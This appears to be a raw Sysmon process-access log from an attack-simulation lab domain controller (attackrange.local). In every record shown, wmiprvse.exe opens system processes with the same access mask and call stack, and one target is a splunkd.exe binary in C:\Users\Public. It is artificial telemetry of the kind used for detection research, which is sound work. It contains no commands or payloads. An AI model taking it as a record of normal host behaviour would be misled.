15:59:42.225{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027225Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.225{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027224Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.225{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027223Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.225{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027222Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.225{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027221Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.225{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027220Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.225{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027219Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.225{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027218Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.225{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027217Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.225{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027216Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.225{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027215Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.225{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027214Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.225{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027213Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.225{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027212Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.209{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027211Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.209{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027210Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.209{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027209Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.209{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027208Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.209{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027207Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.209{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027206Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 